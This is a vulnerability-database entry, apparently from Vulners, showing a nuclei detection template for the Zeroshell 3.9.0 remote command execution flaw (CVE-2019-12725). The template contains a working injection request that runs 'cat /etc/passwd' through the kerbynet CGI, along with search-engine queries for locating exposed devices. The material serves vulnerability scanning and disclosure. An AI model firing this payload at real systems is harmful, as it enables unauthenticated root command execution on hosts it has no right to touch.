Lucene search
K

Zeroshell 3.9.0 - Remote Command Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 94 Views

Zeroshell 3.9.0 - Remote Command Execution vulnerability. Exploits mishandled HTTP parameters to execute arbitrary commands

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
ZeroShell 3.9.0 - (cgi-bin/kerbynet) Remote Root Command Injection Exploit
24 Nov 202000:00
zdt
0day.today
ZeroShell 3.9.0 - Remote Command Execution Exploit
13 May 202100:00
zdt
GithubExploit
Exploit for OS Command Injection in Zeroshell
13 Jun 202123:57
githubexploit
GithubExploit
Exploit for OS Command Injection in Zeroshell
22 May 202105:06
githubexploit
GithubExploit
Exploit for OS Command Injection in Zeroshell
27 Apr 202103:36
githubexploit
ATTACKERKB
CVE-2019-12725
19 Jul 201900:00
attackerkb
Circl
CVE-2019-12725
19 Jul 202019:18
circl
CNVD
Zeroshell Remote Command Execution Vulnerability
23 Jul 201900:00
cnvd
Check Point Advisories
Zeroshell Remote Code Execution (CVE-2019-12725)
9 Sep 202000:00
checkpoint_advisories
CVE
CVE-2019-12725
19 Jul 201922:17
cve
Rows per page
id: CVE-2019-12725

info:
  name: Zeroshell 3.9.0 - Remote Command Execution
  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
  reference:
    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
    - https://zeroshell.org/blog/
    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12725
    cwe-id: CWE-78
    epss-score: 0.89849
    epss-percentile: 0.99777
    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2019,packetstorm,rce,zeroshell,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210098be7c1bfa28074cda9e31747fc3559e3faae1d855dc156de7c8619475cb3ed6022100ffe58bf03daa81fb31ebe69fe15f8d712b162b78ff892ecccdaf8da0b755621e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 39.8
CVSS 210
EPSS0.89849
94